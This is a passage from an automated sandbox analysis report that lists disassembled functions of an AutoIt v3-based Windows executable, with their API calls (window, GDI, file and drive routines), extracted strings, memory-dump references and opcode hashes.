                                                                                                                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                              • Instruction Fuzzy Hash: 06C1D37220519349DF2D463AC43453FFAA15AB27B171A07AFD8B3CB7D0EE28C564D624
                                                                                                                                                                              Function 004D12F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                              • Instruction ID: ee1276db8fe123698a3947527a5b5bdabf0f3ed0a5f5c4fca6921ce264d4e3a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                              • Instruction Fuzzy Hash: E1C1A5722051934ADF2D4639C47453FBAA15AB27B131A076FD8B3CB7E4EE2CC524D624
                                                                                                                                                                              Function 004D0A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                              • Instruction ID: f75f94b3e2d802c6c6bc6ade5a26789d1f10ac9b0e772c049a7d2f6efbccfa53
                                                                                                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                              • Instruction Fuzzy Hash: 05C1C27220919349DF2D8639843463FBBA15AB27B5B1A076FD4B3CB7C0EE28D524D624
                                                                                                                                                                              Function 004D0677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                              • Instruction ID: 6278b46532a002930161354ec8d8fb71763622f11a0aca5ff934a780a6edf616
                                                                                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                              • Instruction Fuzzy Hash: C9C1D37220519349DF2D463A843463FBBA15EB27B170A076FE4B3CB7C5EE28D524E624
                                                                                                                                                                              Function 0050A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0050A7A5
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0050A7B7
                                                                                                                                                                              • DestroyWindow.USER32 ref: 0050A7C5
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0050A7DF
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0050A7E6
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0050A927
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0050A937
                                                                                                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A97F
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0050A98B
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0050A9C5
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9E7
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9FA
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA05
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0050AA0E
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA1D
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0050AA26
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA2D
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0050AA38
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA4A
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0053D9BC,00000000), ref: 0050AA60
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0050AA70
                                                                                                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0050AA96
                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0050AAB5
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AAD7
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050ACC4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                              • Opcode ID: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                                                                                                                                              • Instruction ID: 667cc70ef0b1ab01f2f116d96bac7fbc1ee22238ee621c8ec065c052a203ee14
                                                                                                                                                                              • Opcode Fuzzy Hash: 009e351fe8698f42d1c2e9b0430603557b428c53219328f547ab14c662eb64ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 62027B75A00218EFDB14DFA8DC89EAE7BB9FF48310F008119F915AB2A1D734AD45DB60
                                                                                                                                                                              Function 0051D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0051D0EB
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0051D11C
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0051D128
                                                                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0051D142
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0051D151
                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D17C
                                                                                                                                                                              • GetSysColor.USER32(00000010), ref: 0051D184
                                                                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0051D18B
                                                                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 0051D19A
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0051D1A1
                                                                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0051D1EC
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 0051D21E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051D249
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(00000012), ref: 0051D3BE
                                                                                                                                                                                • Part of subcall function 0051D385: SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(00000011), ref: 0051D400
                                                                                                                                                                                • Part of subcall function 0051D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                                                                                                                                                • Part of subcall function 0051D385: SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                                                                                                                                                • Part of subcall function 0051D385: SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                                                                                                                                                • Part of subcall function 0051D385: SelectObject.GDI32(?,?), ref: 0051D435
                                                                                                                                                                                • Part of subcall function 0051D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                                                                                                                                                • Part of subcall function 0051D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                                                                                                                                                • Part of subcall function 0051D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                                                                                                                                                • Part of subcall function 0051D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3521893082-0
                                                                                                                                                                              • Opcode ID: 6d14f86ee54136a498f352f0973f6336c3b1107fb5c11c9da7c4a18f3f661fd1
                                                                                                                                                                              • Instruction ID: 389a50723e955cca1da23e3a852b1967d9c1b75851f0c083c7639572d817a11a
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d14f86ee54136a498f352f0973f6336c3b1107fb5c11c9da7c4a18f3f661fd1
                                                                                                                                                                              • Instruction Fuzzy Hash: F391A372408301BFDB109F64EC48E6BBBB9FF99321F100A19F962962E0D771D948DB61
                                                                                                                                                                              Function 004B48C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32 ref: 004B4956
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004B4998
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004B49A3
                                                                                                                                                                              • DestroyIcon.USER32(00000000), ref: 004B49AE
                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 004B49B9
                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0052E179
                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0052E1B2
                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0052E5E0
                                                                                                                                                                                • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                                                                                                                                              • SendMessageW.USER32 ref: 0052E627
                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0052E63E
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0052E654
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0052E65F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 464785882-4108050209
                                                                                                                                                                              • Opcode ID: f30d77de6a72ca5e8b51ee1179f3dffb2bf02e9c426636d56dc4f0fcb69950c9
                                                                                                                                                                              • Instruction ID: cb427c885071078c00a2aa69d72df63eb6a5d19612b5154ab0d6f6e38e4ac071
                                                                                                                                                                              • Opcode Fuzzy Hash: f30d77de6a72ca5e8b51ee1179f3dffb2bf02e9c426636d56dc4f0fcb69950c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E12C370200221DFDB25CF24E886BAABBF5BF56304F144569F559CB292C731EC46DBA1
                                                                                                                                                                              Function 0050A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0050A42A
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0050A4E9
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0050A527
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0050A539
                                                                                                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0050A57F
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0050A58B
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0050A5CF
                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0050A5DE
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0050A5EE
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0050A5F2
                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0050A602
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A60B
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0050A614
                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0050A642
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0050A659
                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0050A694
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0050A6A8
                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0050A6B9
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0050A6E9
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0050A6F4
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0050A6FF
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0050A709
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                              • Opcode ID: 3d98fdddeac96d0de8639eda0ad2d56f151e8a1ed6f6cbd13cd92e1b2ec13a5c
                                                                                                                                                                              • Instruction ID: 2c76c3185ea3b3c6a58ba32e674248ad75713783da03fb2387bf439495dd9b0a
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d98fdddeac96d0de8639eda0ad2d56f151e8a1ed6f6cbd13cd92e1b2ec13a5c
                                                                                                                                                                              • Instruction Fuzzy Hash: AEA1AD75A00614BFEB14DBA9DC8AFAE7BB9FB04710F004119FA14A72E0D7B4AD44DB64
                                                                                                                                                                              Function 004FE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FE45E
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0054DC88,?,\\.\,0054DBF0), ref: 004FE54B
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,0054DC88,?,\\.\,0054DBF0), ref: 004FE6B1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                              • Opcode ID: 8cab69f233118a0495215aef9ea6230ddae24256b2c9fd9cf09ec4cf85230760
                                                                                                                                                                              • Instruction ID: 63524cbcb6dcb30a50da728b048f6748c260a89a3efe9d50101f046c94401960
                                                                                                                                                                              • Opcode Fuzzy Hash: 8cab69f233118a0495215aef9ea6230ddae24256b2c9fd9cf09ec4cf85230760
                                                                                                                                                                              • Instruction Fuzzy Hash: 6051A53024430DABD300DF16C89187ABBA1BFA4709B90491FF646D72B1D669DF47DA4B
                                                                                                                                                                              Function 004BC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                              • API String ID: 1038674560-86951937
                                                                                                                                                                              • Opcode ID: a5a2a0c70c4b5b098e76aa0c16231ea96d19b2cc0461655ec9583d5e3d23de6b
                                                                                                                                                                              • Instruction ID: 37831aab6a089d47b5f78cdcb01e5e23c1876fa96cd8d11d30e1bb0b19fd9699
                                                                                                                                                                              • Opcode Fuzzy Hash: a5a2a0c70c4b5b098e76aa0c16231ea96d19b2cc0461655ec9583d5e3d23de6b
                                                                                                                                                                              • Instruction Fuzzy Hash: 7461F63164021277DB21BA259DD2FFA3668BF16748F14002BFD45A72C2EF9CDA01C6B9
                                                                                                                                                                              Function 0051C4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0051C598
                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0051C64E
                                                                                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0051C669
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0051C925
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                                                                                              • Opcode ID: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                                                                                                                                              • Instruction ID: 98ef98132f477de03a39c8de4ccdf436a1df1b2710e9ac86a2a4acb8d2b4669d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc755507acc21daea0f0552d2bf236c4f2d272471e33da680729eeb4e47fe5e
                                                                                                                                                                              • Instruction Fuzzy Hash: E4F1EF71184301AFE7118F24C889BEABFF4FF49754F080A2DF599962A1C776D884DB92
                                                                                                                                                                              Function 00516189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,0054DBF0), ref: 00516245
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
